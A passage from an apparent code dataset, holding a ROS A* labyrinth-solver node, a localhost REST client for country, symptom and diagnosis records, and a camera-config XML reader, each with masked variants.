center[0]%20-10\n\t\tchecky = center[1]%20-15\n\t\tif abs(checkx) <= abs(checky):\n\t\t\tnewx = center[0] - checkx\n\t\t\tnewy = center[1]*0.955\n\t\telif abs(checkx) > abs(checky):\n\t\t\tnewx = center[0]\n\t\t\tnewy = 0.955*(center[1] - checky) \n\t\tnewcenter = (newx, int(newy))\n\t\t# read the reference map for animation\t\n\t\tmap_ref = cv2.imread('/home/sunyue/catkin_ws/src/tracking/map.png')\n\t\tcv2.circle(map_ref,newcenter,radius,(0,0,255),-5)\n\t\t\n\t\t# SECOND transfer the real location to the 20x20 grid\n\t\tgridx = newcenter[0]/20+1\n\t\tgridy = newcenter[1]/20+1\n\n\n\n\t\t# A* for path planning\n\t\tgoal = [10,2]\n\t\tcurrent = [gridx, gridy]\n\t\tprecheck = abs(current[0]-goal[0])+abs(current[1]-goal[1])\n\t\tif 
precheck == 0: check = 0\n\t\telse: check = 100\n\t\tpath = np.array([current])\n\t\tbackup = np.array([[0,0,0,0]])\n\n\n\t\twhile check!=0:\n\t\t\t# generate the potential candidate\n\t\t\tnorth = [current[0],current[1]-1]\n\t\t\tsouth = [current[0],current[1]+1]\n\t\t\teast = [current[0]+1,current[1]]\n\t\t\twest = [current[0]-1,current[1]]\n\n\t\t\t#print current\n\n\t\t\t# calculate the heuristic\n\t\t\tn_heuristic = math.sqrt(pow(north[0]-goal[0],2)+pow(north[1]-goal[1],2))\n\t\t\ts_heuristic = math.sqrt(pow(south[0]-goal[0],2)+pow(south[1]-goal[1],2))\n\t\t\te_heuristic = math.sqrt(pow(east[0]-goal[0],2)+pow(east[1]-goal[1],2))\n\t\t\tw_heuristic = math.sqrt(pow(west[0]-goal[0],2)+pow(west[1]-goal[1],2))\n\n\t\t\t# check the punishment of obstacle\n\t\t\tif MAP[north[1]-1,north[0]-1]==0: n_punish = 2000\n\t\t\telse: n_punish = 0\n\t\t\tif MAP[south[1]-1,south[0]-1]==0: s_punish = 2000\n\t\t\telse: s_punish = 0\n\t\t\tif MAP[east[1]-1,east[0]-1]==0: e_punish = 2000\n\t\t\telse: e_punish = 0\n\t\t\tif MAP[west[1]-1,west[0]-1]==0: w_punish = 2000\n\t\t\telse: w_punish = 0\n\n\t\t\t#print n_punish, s_punish, e_punish, w_punish\n\t\t\t# check last node never go back\n\t\t\tnum = path.shape[0] # get the path step number\n\t\t\tif num!=1:\n\t\t\t\tlast_step = path[-2]\n\t\t\t\tn_check = north - last_step\n\t\t\t\ts_check = south - last_step\n\t\t\t\te_check = east - last_step\n\t\t\t\tw_check = west - last_step\n\t\t\t\tif ( n_check[0]==0 and n_check[1]==0): n_punish = 2000\n\t\t\t\tif ( s_check[0]==0 and s_check[1]==0): s_punish = 2000\n\t\t\t\tif ( e_check[0]==0 and e_check[1]==0): e_punish = 2000\n\t\t\t\tif ( w_check[0]==0 and w_check[1]==0): w_punish = 2000\n\n\t\t\t# sum the cost together\n\t\t\tn_cost = int(n_heuristic + n_punish)\n\t\t\ts_cost = int(s_heuristic + s_punish)\n\t\t\te_cost = int(e_heuristic + e_punish)\n\t\t\tw_cost = int(w_heuristic + w_punish)\n\t\t\tcost = [n_cost, s_cost, e_cost, w_cost]\n\n\n\t\t\t# there will be some situations should be 
taken into consideration\n\t\t\tindex = np.argmin(cost) # where the smallest cost is located\n\t\t\tmincost = cost[index]\n\t\t\t# First only one direction cost is less than 1000, then just pick that\n\t\t\tif mincost<=1000: # there must be at least one solution\n\t\t\t\tsumcheck = cost[0]+cost[1]+cost[2]+cost[3]\n\t\t\t\tif sumcheck >= 6000: # only one next choice\n\t\t\t\t\tif index == 0: next = north\n\t\t\t\t\telif index == 1: next = south\n\t\t\t\t\telif index == 2: next = east\n\t\t\t\t\telif index == 3: next = west\n\t\t\t\t\t# update the path\n\t\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t\t# update the check for next while\n\t\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\t\tif precheck == 0:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t# updat the current\n\t\t\t\t\tcurrent = next\n\n\t\t\t\telif (sumcheck >= 4000 and sumcheck < 6000) : # two posible choices\n\t\t\t\t\tif index == 0: next = north\n\t\t\t\t\telif index == 1: next = south\n\t\t\t\t\telif index == 2: next = east\n\t\t\t\t\telif index == 3: next = west\n\t\t\t\t\t# update the path choose the one have the least cost\n\t\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t\t# update the check for next while\n\t\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\t\tif precheck == 0:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t# save the branch to the back up [current, branch]\n\t\t\t\t\tfakecost = cost\n\t\t\t\t\tfakecost[index] = 2000\t# mannually fake the minimum cost choice\n\t\t\t\t\tfakeindex = np.argmin(fakecost) # where the smallest cost is located\n\t\t\t\t\tif fakeindex == 0: branch = north\n\t\t\t\t\telif fakeindex == 1: branch = south\n\t\t\t\t\telif fakeindex == 2: branch = east\n\t\t\t\t\telif fakeindex == 3: branch = west\n\t\t\t\t\tbackup = np.append([[current[0],current[1],branch[0],branch[1]]], backup, axis=0)\n\t\t\t\t\t# updat the current\n\t\t\t\t\tcurrent = next\n\n\t\t\t\telif (sumcheck >= 2000 and sumcheck < 4000) : # three posible 
choices\n\t\t\t\t\tif index == 0: next = north\n\t\t\t\t\telif index == 1: next = south\n\t\t\t\t\telif index == 2: next = east\n\t\t\t\t\telif index == 3: next = west\n\t\t\t\t\t# update the path choose the one have the least cost\n\t\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t\t# update the check for next while\n\t\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\t\tif precheck == 0:\n\t\t\t\t\t\tcheck = 0\n\t\t\t\t\t# save the branch to the back up [current, branch]\n\t\t\t\t\t# second cost\n\t\t\t\t\tsecondcost = cost\n\t\t\t\t\tsecondcost[index] = 2000\t# mannually fake the minimum cost choice\n\t\t\t\t\tsecondindex = np.argmin(secondcost) # where the smallest cost is located\n\t\t\t\t\tif secondindex == 0: branch1 = north\n\t\t\t\t\telif secondindex == 1: branch1 = south\n\t\t\t\t\telif secondindex == 2: branch1 = east\n\t\t\t\t\telif secondindex == 3: branch1 = west\n\n\t\t\t\t\tthirdcost = secondcost\n\t\t\t\t\tthirdcost[secondindex] = 2000\t# mannually fake the minimum cost choice\n\t\t\t\t\tthirdindex = np.argmin(thirdcost) # where the smallest cost is located\n\t\t\t\t\tif thirdindex == 0: branch2 = north\n\t\t\t\t\telif thirdindex == 1: branch2 = south\n\t\t\t\t\telif thirdindex == 2: branch2 = east\n\t\t\t\t\telif thirdindex == 3: branch2 = west\n\t\t\t\t\t# update branch based on cost difference\n\t\t\t\t\tbackup = np.append([[current[0],current[1],branch2[0],branch2[1]]], backup, axis=0)\n\t\t\t\t\tbackup = np.append([[current[0],current[1],branch1[0],branch1[1]]], backup, axis=0)\n\t\t\t\t\t# updat the current\n\t\t\t\t\tcurrent = next\n\n\n\n\t\t\telif mincost>=2000: # there is no next choice we have go to backup branchs\n\t\t\t\t# next step is the first ranking branch\t\t\t\t\n\t\t\t\tnext = [backup[0,2],backup[0,3]]\n\t\t\t\t# cut the path back\n\t\t\t\tcurrent = [backup[0,0],backup[0,1]]\n\t\t\t\tcompare = abs(path-current)\n\t\t\t\tsummation = sum(np.transpose(compare))\n\t\t\t\tindex = 
np.argmin(summation)\n\t\t\t\t# cut the path from 0 to current one\n\t\t\t\tpath = path[:index+1]\n\t\t\t\t# update the path with next step\n\t\t\t\tpath = np.append(path,[next],axis=0)\n\t\t\t\t# delete the first backup\n\t\t\t\tbackup = backup[1:]\n\t\t\t\t# update the check for next while\n\t\t\t\tprecheck = abs(next[0]-goal[0])+abs(next[1]-goal[1])\n\t\t\t\tif precheck == 0:\n\t\t\t\t\tcheck = 0\n\t\t\t\t# updat the current\n\t\t\t\tcurrent = next\n\t\t\n\t\t# A* algorithm is ended\n\n\t\tsteps = path.shape[0]\n\t\ti = 0\n\t\twhile i < steps-1:\n\t\t\tcv2.line(map_ref,(20*path[i,0]-10,20*path[i,1]-10),(20*path[i+1,0]-10,20*path[i+1,1]-10),(255,0,0),3)\n\t\t\ti = i+1\n\n\t\tcv2.imshow(\"Map Image\", map_ref)\n\n\t\tcv2.waitKey(1)\n\n\t\ttry:\n\t\t\tself.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, encoding=\"bgr8\"))\n\t\texcept CvBridgeError, e:\n\t\t\tprint e\n\ndef main(args):\n\tic = labyrinth_solver()\n\trospy.init_node('labyrinth_solver', anonymous=True)\n\ttry:\n\t\trospy.spin()\n\texcept KeyboardInterrupt:\n\t\tprint \"Shutting down\"\n\tcv2.destroyAllWindows()\n \nif __name__ == '__main__':\n\t\tmain(sys.argv)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import requests
import json
# Base URL of the local API server that every request helper below targets.
ROOT_URL = "http://localhost:5000"
def get_all_countries():
    """Fetch every country record; returns the ``countries`` list from the JSON reply."""
    url = "{}/countries".format(ROOT_URL)
    return requests.get(url).json()["countries"]
def get_country_probability(countryIds):
    """Look up the probability associated with the given country ids.

    Returns the ``probability`` field of the JSON reply unchanged.
    """
    payload = {"countryIds": countryIds}
    # NOTE(review): a GET request carrying a body is unusual; presumably the
    # server reads it anyway -- confirm before changing to query params.
    reply = requests.get("{}/countries/probability".format(ROOT_URL), data=payload)
    return reply.json()["probability"]
def add_country(country_name, country_code):
    """Create a new country record and return the API's JSON reply."""
    form = {"country_name": country_name, "country_code": country_code}
    return requests.post("{}/countries".format(ROOT_URL), data=form).json()
def update_country(id, country_name=None, country_code=None):
    """Update an existing country record.

    Args:
        id: Identifier of the country to update.
        country_name: New name, or None to leave the name unchanged.
        country_code: New code, or None to leave the code unchanged.

    Returns:
        The ``updates`` field of the JSON reply.
    """
    body = {"id": id}
    # Only send the fields the caller actually wants to change.
    # Use ``is not None`` (identity) rather than ``!= None`` per PEP 8.
    if country_name is not None:
        body["country_name"] = country_name
    if country_code is not None:
        body["country_code"] = country_code
    response = requests.put("{}/countries".format(ROOT_URL), data=body)
    return response.json()["updates"]
def delete_country(id):
    """Delete the country with the given id and return the JSON reply."""
    reply = requests.delete("{}/countries".format(ROOT_URL), data={"id": id})
    return reply.json()
def get_all_symptoms():
    """Fetch every symptom record; returns the ``symptoms`` list from the JSON reply."""
    url = "{}/symptoms".format(ROOT_URL)
    return requests.get(url).json()["symptoms"]
def get_symptom_probability(symptomIds):
    """Look up the probability associated with the given symptom ids.

    Returns the ``probability`` field of the JSON reply unchanged.
    """
    payload = {"symptomIds": symptomIds}
    reply = requests.get("{}/symptoms/probability".format(ROOT_URL), data=payload)
    return reply.json()["probability"]
def add_symptom(name):
    """Create a new symptom record and return the API's JSON reply."""
    return requests.post("{}/symptoms".format(ROOT_URL), data={"name": name}).json()
def update_symptom(id, name=None):
    """Update an existing symptom record.

    Args:
        id: Identifier of the symptom to update.
        name: New name, or None to leave the name unchanged.

    Returns:
        The ``updates`` field of the JSON reply.
    """
    body = {"id": id}
    # Only include the name when the caller supplied one.
    # Use ``is not None`` (identity) rather than ``!= None`` per PEP 8.
    if name is not None:
        body["name"] = name
    response = requests.put("{}/symptoms".format(ROOT_URL), data=body)
    return response.json()["updates"]
def delete_symptom(id):
    """Delete the symptom with the given id and return the JSON reply."""
    reply = requests.delete("{}/symptoms".format(ROOT_URL), data={"id": id})
    return reply.json()
def get_diagnosis(id):
    """Fetch a single diagnosis by id (sent as a query-string parameter)."""
    url = "{}/diagnoses?id={}".format(ROOT_URL, str(id))
    return requests.get(url).json()["diagnosis"]
def get_all_diagnoses():
    """Fetch every diagnosis; returns the ``diagnoses`` list from the JSON reply."""
    return requests.get("{}/diagnoses".format(ROOT_URL)).json()["diagnoses"]
def add_diagnosis(name, temperature, result, countryIds, symptomIds):
    """Create a diagnosis record and return the API's JSON reply."""
    form = {
        "name": name,
        "temperature": temperature,
        "result": result,
        "countryIds": countryIds,
        "symptomIds": symptomIds,
    }
    return requests.post("{}/diagnoses".format(ROOT_URL), data=form).json()
def delete_diagnosis(id):
    """Delete the diagnosis with the given id and return the JSON reply."""
    reply = requests.delete("{}/diagnoses".format(ROOT_URL), data={"id": id})
    return reply.json()
if __name__ == '__main__':
    # Library module: the helpers above are meant to be imported,
    # so there is nothing to execute directly.
    pass
|
normal
|
{
"blob_id": "6aa7114db66a76cfa9659f5537b1056f40f47bd2",
"index": 3975,
"step-1": "<mask token>\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\n<mask token>\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\n<mask token>\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 
'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\n<mask token>\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\n<mask token>\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 
'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef delete_diagnosis(id):\n body = {'id': id}\n response = requests.delete('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_country(id):\n body = {'id': id}\n response = requests.delete('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_symptom(name):\n body = {'name': name}\n response = requests.post('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return 
response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef delete_diagnosis(id):\n body = {'id': id}\n response = requests.delete('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\nif __name__ == '__main__':\n pass\n",
"step-4": "import requests\nimport json\nROOT_URL = 'http://localhost:5000'\n\n\ndef get_all_countries():\n response = requests.get('{}/countries'.format(ROOT_URL))\n return response.json()['countries']\n\n\ndef get_country_probability(countryIds):\n body = {'countryIds': countryIds}\n response = requests.get('{}/countries/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_country(country_name, country_code):\n body = {'country_name': country_name, 'country_code': country_code}\n response = requests.post('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_country(id, country_name=None, country_code=None):\n body = {'id': id}\n if country_name != None:\n body['country_name'] = country_name\n if country_code != None:\n body['country_code'] = country_code\n response = requests.put('{}/countries'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_country(id):\n body = {'id': id}\n response = requests.delete('{}/countries'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_all_symptoms():\n response = requests.get('{}/symptoms'.format(ROOT_URL))\n return response.json()['symptoms']\n\n\ndef get_symptom_probability(symptomIds):\n body = {'symptomIds': symptomIds}\n response = requests.get('{}/symptoms/probability'.format(ROOT_URL),\n data=body)\n return response.json()['probability']\n\n\ndef add_symptom(name):\n body = {'name': name}\n response = requests.post('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef update_symptom(id, name=None):\n body = {'id': id}\n if name != None:\n body['name'] = name\n response = requests.put('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()['updates']\n\n\ndef delete_symptom(id):\n body = {'id': id}\n response = requests.delete('{}/symptoms'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef get_diagnosis(id):\n id = str(id)\n response = 
requests.get('{}/diagnoses?id={}'.format(ROOT_URL, id))\n return response.json()['diagnosis']\n\n\ndef get_all_diagnoses():\n response = requests.get('{}/diagnoses'.format(ROOT_URL))\n return response.json()['diagnoses']\n\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n body = {'name': name, 'temperature': temperature, 'result': result,\n 'countryIds': countryIds, 'symptomIds': symptomIds}\n response = requests.post('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\ndef delete_diagnosis(id):\n body = {'id': id}\n response = requests.delete('{}/diagnoses'.format(ROOT_URL), data=body)\n return response.json()\n\n\nif __name__ == '__main__':\n pass\n",
"step-5": "import requests\nimport json\n\nROOT_URL = \"http://localhost:5000\"\n\ndef get_all_countries():\n\tresponse = requests.get(\"{}/countries\".format(ROOT_URL))\n\treturn response.json()[\"countries\"]\n\ndef get_country_probability(countryIds):\n\tbody = {\"countryIds\": countryIds}\n\tresponse = requests.get(\"{}/countries/probability\".format(ROOT_URL), data=body)\n\treturn response.json()[\"probability\"]\n\ndef add_country(country_name, country_code):\n\tbody = {\"country_name\": country_name, \"country_code\": country_code}\n\tresponse = requests.post(\"{}/countries\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef update_country(id, country_name=None, country_code=None):\n\tbody = {\"id\": id}\n\tif country_name != None:\n\t\tbody[\"country_name\"] = country_name\n\tif country_code != None:\n\t\tbody[\"country_code\"] = country_code\n\tresponse = requests.put(\"{}/countries\".format(ROOT_URL), data=body)\n\treturn response.json()[\"updates\"]\n\ndef delete_country(id):\n\tbody = {\"id\": id}\n\tresponse = requests.delete(\"{}/countries\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef get_all_symptoms():\n\tresponse = requests.get(\"{}/symptoms\".format(ROOT_URL))\n\treturn response.json()[\"symptoms\"]\n\ndef get_symptom_probability(symptomIds):\n\tbody = {\"symptomIds\": symptomIds}\n\tresponse = requests.get(\"{}/symptoms/probability\".format(ROOT_URL), data=body)\n\treturn response.json()[\"probability\"]\n\ndef add_symptom(name):\n\tbody = {\"name\": name}\n\tresponse = requests.post(\"{}/symptoms\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef update_symptom(id, name=None):\n\tbody = {\"id\": id}\n\tif name != None:\n\t\tbody[\"name\"] = name\n\n\tresponse = requests.put(\"{}/symptoms\".format(ROOT_URL), data=body)\n\treturn response.json()[\"updates\"]\n\ndef delete_symptom(id):\n\tbody = {\"id\": id}\n\tresponse = requests.delete(\"{}/symptoms\".format(ROOT_URL), data=body)\n\treturn 
response.json()\n\ndef get_diagnosis(id):\n\tid = str(id)\n\tresponse = requests.get(\"{}/diagnoses?id={}\".format(ROOT_URL, id))\n\treturn response.json()[\"diagnosis\"]\n\ndef get_all_diagnoses():\n\tresponse = requests.get(\"{}/diagnoses\".format(ROOT_URL))\n\treturn response.json()[\"diagnoses\"]\n\ndef add_diagnosis(name, temperature, result, countryIds, symptomIds):\n\tbody = {\"name\": name, \"temperature\": temperature, \"result\": result, \"countryIds\": countryIds, \"symptomIds\": symptomIds}\n\tresponse = requests.post(\"{}/diagnoses\".format(ROOT_URL), data=body)\n\treturn response.json()\n\ndef delete_diagnosis(id):\n\tbody = {\"id\": id}\n\tresponse = requests.delete(\"{}/diagnoses\".format(ROOT_URL), data=body)\n\treturn response.json()\n\nif __name__ == '__main__':\n\tpass\n",
"step-ids": [
11,
12,
15,
17,
18
]
}
|
[
11,
12,
15,
17,
18
] |
#!/usr/bin/env python2.7
'''
lib script to encapsulate the camera info
'''
from xml.dom import minidom, Node
# Path to the XML file that describes all configured cameras.
# NOTE(review): the original comment here described file-system cleanup
# thresholds, which does not match this constant -- presumably leftover
# from a copy/paste; confirm nothing else depends on it.
CAMERA_XML_FILE = "/tmp/cameras.xml"
def cameras_get_info():
    '''
    cameras_get_info - reads the camera info from the XML file and
    puts it into a python data structure and returns it.

    Returns a (status, cameras_info) tuple: status is always 0, and
    cameras_info is a list with one dict per <camera> element, holding
    the 'id' attribute plus the text of each child tag listed below.
    '''
    status = 0
    xmldoc = minidom.parse(CAMERA_XML_FILE)
    itemlist = xmldoc.getElementsByTagName('camera')
    # Child tags copied verbatim out of each <camera> element; extracting
    # them in a loop replaces ten duplicated getElementsByTagName stanzas.
    fields = ('user', 'model', 'passwd', 'port', 'ip_address',
              'disk_location', 'mfgr', 'ftp_loc', 'status', 'location')
    # camera info to return
    cameras_info = []
    # Iterating the node list directly also drops the py2-only xrange().
    for item in itemlist:
        info = {'id': item.attributes['id'].value}
        for tag in fields:
            # Indexing [0] raises IndexError when a tag is missing,
            # matching the original per-tag a[0] behavior.
            info[tag] = item.getElementsByTagName(tag)[0].firstChild.data
        cameras_info.append(info)
    return status, cameras_info
|
normal
|
{
"blob_id": "510d411d79d5df8658703241f161b3e2a9ec5932",
"index": 4110,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef cameras_get_info():\n \"\"\"\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n \"\"\"\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id': itemlist[i].attributes['id'].value})\n a = itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('location')\n cameras_info[i].update({'location': a[0].firstChild.data})\n return status, cameras_info\n",
"step-3": "<mask token>\nCAMERA_XML_FILE = '/tmp/cameras.xml'\n\n\ndef cameras_get_info():\n \"\"\"\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n \"\"\"\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id': itemlist[i].attributes['id'].value})\n a = itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('location')\n cameras_info[i].update({'location': a[0].firstChild.data})\n return status, cameras_info\n",
"step-4": "<mask token>\nfrom xml.dom import minidom, Node\nCAMERA_XML_FILE = '/tmp/cameras.xml'\n\n\ndef cameras_get_info():\n \"\"\"\n cameras_get_info - reads the camera info from the XML file and\n puts it into a python data structure and returns it.\n \"\"\"\n status = 0\n xmldoc = minidom.parse(CAMERA_XML_FILE)\n itemlist = xmldoc.getElementsByTagName('camera')\n cameras_info = []\n for i in xrange(len(itemlist)):\n cameras_info.append({'id': itemlist[i].attributes['id'].value})\n a = itemlist[i].getElementsByTagName('user')\n cameras_info[i].update({'user': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('model')\n cameras_info[i].update({'model': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('passwd')\n cameras_info[i].update({'passwd': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('port')\n cameras_info[i].update({'port': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ip_address')\n cameras_info[i].update({'ip_address': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('disk_location')\n cameras_info[i].update({'disk_location': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('mfgr')\n cameras_info[i].update({'mfgr': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('ftp_loc')\n cameras_info[i].update({'ftp_loc': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('status')\n cameras_info[i].update({'status': a[0].firstChild.data})\n a = itemlist[i].getElementsByTagName('location')\n 